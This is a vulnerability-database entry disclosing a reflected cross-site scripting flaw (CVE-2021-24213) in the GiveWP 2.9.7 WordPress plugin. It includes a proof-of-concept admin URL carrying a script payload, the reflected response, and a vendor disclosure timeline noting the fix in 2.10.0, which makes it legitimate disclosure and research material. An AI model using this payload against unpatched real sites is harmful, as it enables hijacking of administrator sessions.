WordPress GiveWP 2.9.7 Cross Site Scripting

2021.03.24
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

# Exploit Title: GiveWP 2.9.7 Reflected Cross-Site Scripting # Date: 3/23/2021 # Exploit Author: Austin Bentley # Vendor Homepage: https://givewp.com/ # Software Link: https://wordpress.org/plugins/give/ # Version: 2.9.7 # Tested on: Windows 7 # CVE: CVE-2021-24213 Exploitation requirements: Admin must visit payload URL. Default config. Tested on: GiveWP 2.9.7, Wordpress 5.7, XAMPP 7.4.16, Firefox 86.0.1. Default configs on all products. Vulnerable since: 2.4.0, Jan 16th 2019, commit 097c4d0ab964493776950381ed64498040395f6b Active Installations: 100,000+ per https://wordpress.org/plugins/give/ Researcher: Austin Bentley (https://bentl.ee/) Detailed writeup available at httpS://bentl.ee/posts/cve-givewp/ PoC URL: http://localhost/wp-admin/edit.php?s=%22%3E<script>alert(0)</script>&start-date&end-date&form_id=0&action=-1&paged=1&give_action=delete_bulk_donor&orderby=id&order=DESC&action2=-1&post_type=give_forms&page=give-donors&view=donors Response: --- SNIP --- <div class="give-donor-search-box"> <input type="text" id="give-donors-search-input" placeholder="Name, Email, or Donor ID" name="s" value="\"><script>alert(0)</script>"> <input type="submit" class="button" value="Search" ID="donor-search-submit" /> </div> --- SNIP --- Disclosure Log: 3/21/2021 -- Emailed GiveWP for security contact information 3/22/2021 -- WPScan CNA issued CVE-2021-24213 (un-released) 3/22/2021 -- Provided vendor with PoC 3/22/2021 -- Vendor provided fix in 2.10.0 3/23/2021 -- Fix validated, article posted, CVE unlocked


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top